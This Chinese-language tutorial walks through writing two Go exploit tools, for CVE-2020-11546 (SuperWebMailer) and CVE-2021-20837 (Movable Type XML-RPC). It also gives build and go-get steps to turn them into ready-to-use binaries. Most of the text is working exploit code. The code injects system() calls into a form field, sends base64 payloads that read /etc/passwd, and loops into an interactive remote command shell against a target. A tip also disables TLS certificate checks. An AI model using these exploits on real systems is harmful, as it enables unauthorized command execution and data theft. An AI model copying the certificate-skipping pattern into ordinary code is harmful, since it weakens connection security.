CVE-2020-11546

[!NOTE]

已上传至GitHub:https://github.com/damit5/CVE-2020-11546

扩展1:交叉编译

  1. CGO_ENABLED=0 GOOS=darwin GOARCH=amd64 go build -ldflags="-s -w" -trimpath -o release/superwebmailerRCE_darwin
  2. CGO_ENABLED=0 GOOS=linux GOARCH=amd64 go build -ldflags="-s -w" -trimpath -o release/superwebmailerRCE_linux
  3. CGO_ENABLED=0 GOOS=windows GOARCH=amd64 go build -ldflags="-s -w" -trimpath -o release/superwebmailerRCE_win.exe

扩展2:go.mod

  1. go mod init <仓库地址>
  2. go mod init github.com/damit5/CVE-2020-11546

不然不能go get -u自动下载编译,会出现问题

扩展3:go get

直接使用go get -u github.com/xxx可能出现版本的问题,可以使用如下命令执行版本或者分支

  1. go get -u -v github.com/damit5/CVE-2020-11546@master

[!TIP]

也可以使用@commit hash等等

扩展4:交互输入

  1. for {
  2.     fmt.Printf("\n\ncommand: ")
  3.     _, _ = fmt.Scanln(&command)
  4.     if command != "" {
  5.         break
  6.     }
  7. }

代码

  1. package main
  3. import (
  4.     "bytes"
  5.     "fmt"
  6.     "io/ioutil"
  7.     "net/http"
  8.     "os"
  9.     "strings"
  10. )
  12. func banner(){
  13.     fmt.Println(`
  14.     .___ _____         ____  __          
  15.   __| _//  |  |  _____/_   |/  |_  ______
  16.  / __ |/   |  |_/     \|   \   __\/  ___/
  17. / /_/ /    ^   /  Y Y  \   ||  |  \___ \ 
  18. \____ \____   ||__|_|  /___||__| /____  >
  19.      \/    |__|      \/               \/
  21.         CVE-2020-11546
  22. `)
  23. }
  25. /* *
  26. 参数检查
  27.  */
  28. func argsCheck(args []string) {
  30.     if len(args) != 2 {
  31.         fmt.Printf("Usage:\n\t./%s <target>\n", args[0])
  32.         os.Exit(0)
  33.     }
  34. }
  36. /* *
  37. url处理
  38.  */
  39. func urlHandler(target string) string {
  40.     // 没有http前缀的添加http前缀
  41.     if !strings.HasPrefix(target, "http") {
  42.         target = "http://" + target
  43.     }
  44.     // 有/结尾的就去掉/
  45.     if strings.HasSuffix(target, "/") {    // 去掉后缀 /
  46.         target = strings.TrimSuffix(target, "/")
  47.         fmt.Println(target)
  48.     }
  50.     return target
  51. }
  53. /* *
  54. 漏洞检查
  55.  */
  56. func check(target string) bool {
  57.     // 创建请求
  58.     vulurl := target + "/mailingupgrade.php"
  59.     req, _ := http.NewRequest("POST", vulurl, bytes.NewReader([]byte(`step=4&Language=de%7b$%7bsystem(%22echo vultest%22)%7d%7d&RegName=12345678901234567890123&RegNumber=12345&NextBtn=Weiter+%3E`)))
  60.     req.Header.Set("User-Agent", "Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:71.0) Gecko/20100101 Firefox/71.0")
  61.     req.Header.Set("Content-type", "application/x-www-form-urlencoded")
  63.     // 发起请求
  64.     client := http.Client{}
  65.     resp, _ := client.Do(req)
  66.     body, _ := ioutil.ReadAll(resp.Body)
  67.     if strings.Contains(string(body), "vultest") {
  68.         return true
  69.     }
  70.     return false
  71. }
  73. /* *
  74. 漏洞检查
  75. */
  76. func exp(target string, command string) {
  77.     // 创建请求
  78.     vulurl := target + "/mailingupgrade.php"
  79.     data := `step=4&Language=de%7b$%7bsystem(%22` + command + `%22)%7d%7d&RegName=12345678901234567890123&RegNumber=12345&NextBtn=Weiter+%3E`
  80.     req, _ := http.NewRequest("POST", vulurl, bytes.NewReader([]byte(data)))
  81.     req.Header.Set("User-Agent", "Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:71.0) Gecko/20100101 Firefox/71.0")
  82.     req.Header.Set("Content-type", "application/x-www-form-urlencoded")
  84.     // 发起请求
  85.     client := http.Client{}
  86.     resp, _ := client.Do(req)
  87.     body, _ := ioutil.ReadAll(resp.Body)
  88.     res := strings.Replace(string(body), "Can't load correct language file in /language directory", "", -1)
  89.     res = strings.TrimSpace(res)
  90.     fmt.Println(res)
  91. }
  93. func main() {
  94.     args := os.Args
  95.     banner()
  96.     argsCheck(args)
  97.     target := args[1]
  98.     target = urlHandler(target)
  99.     if check(target) {
  100.         fmt.Printf("target %s is vuln", target)
  101.         var command string
  102.         for {
  103.             for {
  104.                 fmt.Printf("\n\ncommand: ")
  105.                 fmt.Scanln(&command)
  106.                 if command != "" {
  107.                     break
  108.                 }
  109.             }
  110.             exp(target, command)
  111.         }
  112.     } else {
  113.         fmt.Printf("target %s is not vuln", target)
  114.     }
  115. }

image-20211229173338536

测试图

image-20211229152446871

CVE-2021-20837

扩展5:忽略SSL证书

[!WARNING]

这个错误不容易发现,所以需要经验来判断,在初始化客户端的时候需要忽略SSL证书

  1. var Client http.Client
  2. tr := &http.Transport{
  3.     TLSClientConfig: &tls.Config{InsecureSkipVerify: true},    // 忽略SSL证书
  4. }
  5. Client = http.Client{
  6.     Transport: tr,
  7. }

扩展6:正则表达式

默认情况下,.是不能匹配换行符\n的,有时候我们有需要通过.匹配到\n,这个时候就需要稍微修改一下.

[!TIP]

在线正则表达式测试网站:https://regex101.com/

  1. (?s).*

实例:
image-20211229171038928

代码

  1. package main
  3. import (
  4.     "bytes"
  5.     "crypto/tls"
  6.     "encoding/base64"
  7.     "fmt"
  8.     "io/ioutil"
  9.     "net/http"
  10.     "os"
  11.     "regexp"
  12.     "strings"
  13. )
  15. // 客户端全局变量
  16. var Client http.Client
  18. func banner(){
  19.     fmt.Println(`
  20.     .___ _____         ____  __          
  21.   __| _//  |  |  _____/_   |/  |_  ______
  22.  / __ |/   |  |_/     \|   \   __\/  ___/
  23. / /_/ /    ^   /  Y Y  \   ||  |  \___ \ 
  24. \____ \____   ||__|_|  /___||__| /____  >
  25.      \/    |__|      \/               \/
  27.         CVE-2021-20837
  28. `)
  29. }
  31. /* *
  32. 参数检查
  33. */
  34. func argsCheck(args []string) {
  36.     if len(args) != 2 {
  37.         fmt.Printf("Usage:\n\t./%s <target>\n", args[0])
  38.         os.Exit(0)
  39.     }
  40. }
  42. /* *
  43. url处理
  44. */
  45. func urlHandler(target string) string {
  46.     // 没有http前缀的添加http前缀
  47.     if !strings.HasPrefix(target, "http") {
  48.         target = "http://" + target
  49.     }
  50.     // 有/结尾的就去掉/
  51.     if strings.HasSuffix(target, "/") {    // 去掉后缀 /
  52.         target = strings.TrimSuffix(target, "/")
  53.         fmt.Println(target)
  54.     }
  56.     return target
  57. }
  59. /* *
  60. 漏洞检查
  61. */
  62. func check(target string) bool {
  63.     // 创建请求
  64.     vulurl := target + "/cgi-bin/mt/mt-xmlrpc.cgi"
  65.     command := "`cat /etc/passwd`"
  66.     base64_cmd := base64.StdEncoding.EncodeToString([]byte(command))
  67.     payload := fmt.Sprintf(`<?xml version="1.0" encoding="UTF-8"?>
  68.     <methodCall>
  69.       <methodName>mt.handler_to_coderef</methodName>
  70.       <params>
  71.         <param>
  72.           <value>
  73.             <base64>
  74.              %s
  75.             </base64>
  76.           </value>
  77.         </param>
  78.       </params>
  79.     </methodCall>`, base64_cmd)
  80.     req, _ := http.NewRequest("POST", vulurl, bytes.NewReader([]byte(payload)))
  81.     req.Header.Set("User-Agent", "Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:71.0) Gecko/20100101 Firefox/71.0")
  82.     req.Header.Set("Content-type", "text/xml; charset=UTF-8")
  84.     // 发起请求
  85.     tr := &http.Transport{
  86.         TLSClientConfig: &tls.Config{InsecureSkipVerify: true},    // 忽略SSL证书
  87.     }
  88.     Client = http.Client{
  89.         Transport: tr,
  90.     }
  91.     resp, _ := Client.Do(req)
  92.     body, _ := ioutil.ReadAll(resp.Body)
  93.     if strings.Contains(string(body), "root:x:0") {
  94.         return true
  95.     }
  96.     return false
  97. }
  99. /* *
  100. 漏洞检查
  101. */
  102. func exp(target string, command string) {
  103.     // 创建请求
  104.     vulurl := target + "/cgi-bin/mt/mt-xmlrpc.cgi"
  105.     base64_cmd := base64.StdEncoding.EncodeToString([]byte("`" + command + "`"))
  106.     payload := fmt.Sprintf(`<?xml version="1.0" encoding="UTF-8"?>
  107.     <methodCall>
  108.       <methodName>mt.handler_to_coderef</methodName>
  109.       <params>
  110.         <param>
  111.           <value>
  112.             <base64>
  113.              %s
  114.             </base64>
  115.           </value>
  116.         </param>
  117.       </params>
  118.     </methodCall>`, base64_cmd)
  119.     req, _ := http.NewRequest("POST", vulurl, bytes.NewReader([]byte(payload)))
  120.     req.Header.Set("User-Agent", "Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:71.0) Gecko/20100101 Firefox/71.0")
  121.     req.Header.Set("Content-type", "text/xml; charset=UTF-8")
  123.     // 发起请求
  124.     resp, _ := Client.Do(req)
  125.     body, _ := ioutil.ReadAll(resp.Body)
  126.     // 正则表达式匹配结果
  127.     regex, _ := regexp.Compile("Can't\\slocate\\s((?s).*)\\sin @INC")
  128.     res := regex.FindAllStringSubmatch(string(body), 1)[0][1]
  129.     fmt.Println(res)
  130. }
  132. func main() {
  133.     args := os.Args
  134.     banner()
  135.     argsCheck(args)
  136.     target := args[1]
  137.     target = urlHandler(target)
  138.     if check(target) {
  139.         fmt.Printf("target %s is vuln", target)
  140.         var command string
  141.         for {
  142.             for {
  143.                 fmt.Printf("\n\ncommand: ")
  144.                 _, _ = fmt.Scanln(&command)
  145.                 if command != "" {
  146.                     break
  147.                 }
  148.             }
  149.             exp(target, command)
  150.         }
  151.     } else {
  152.         fmt.Printf("target %s is not vuln", target)
  153.     }
  154. }

测试图

image-20211229174210916